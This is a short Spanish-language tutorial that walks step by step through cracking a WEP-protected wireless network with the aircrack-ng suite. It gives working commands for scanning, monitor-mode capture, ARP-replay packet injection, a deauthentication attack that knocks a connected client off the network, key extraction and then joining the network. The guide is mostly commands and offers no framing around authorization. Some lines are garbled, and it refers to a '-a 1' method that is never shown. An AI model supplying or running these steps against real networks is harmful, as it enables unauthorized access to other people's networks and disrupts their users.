Hacking Wireless: Suite Aircrack-ng

1. Escaneo de redes

Se pueden emplear distintas aplicaciones ("airodump-ng" o "kismet"):

airodump-ng rausb0.

2. Captura de paquetes

La captura de paquetes requiere que la tarjeta esté operando en modo monitor:

◦ Usando el comando "iwconfig": iwconfig dispositivo mode monitor

◦ Usando airmon-ng: airmon-ng start dispositivo [canal]

Iniciamos la captura de paquetes con el comando "airodump-ng":airodump-ng -w fichero_de_paquetes -c canal dispositivo

3. Inyección de paquetes

Podemos incrementar el tráfico de paquetes (y por consiguiente la cantidad de IVs) para acelerar el proceso de crackeo de la clave WEP empleando el método "ARP-request reinjection attack". Para ello es necesario que exista una estación conectada al punto de acceso, y a ser posible que ésta envíe información.

Búsqueda de paquetes ARP para reinyectar:aireplay-ng --arpreplay -b <BSSID> -h

<estación_conectada> disp

Podemos forzar la aparición de paquetes ARP mediante un ataque de deautentificación a la estación conectada:

aireplay-ng --deauth 5 -a <BSSID> -c

<estación_conectada> disp

En caso de que tengamos que detener la reinyección podremos reutilizar el paquete ARP capturado en otra ejecución empleando la opción "-r <fichero>" ("aireplay-ng --arpreplay" salva automáticamente el paquete ARP a reinyectar en el disco):

aireplay-ng --arpreplay -b <BSSID> -h <mac_estacion> -r <fichero> disp

Consultar el manual de aircrack-ng: newbie_guide [Aircrack-ng].pdf

4. Extracción de la contraseña

aircrack-ng -b <BSSID> <fichero_de_paquetes.cap>

En el primer método, el parámetro "-a 1" especifica que se trata de cifrado WEP.

5. Conexión a la red con encriptación WEP/WPA

ifconfig <dispositivo> downiwconfig <dispositivo> essid <ssid in ASCII> key <clave en

hex>ifconfig <dispositivo> up

Obtenemos la configuración de red por DHCP:¿¿dhcpcd <dispositivo>??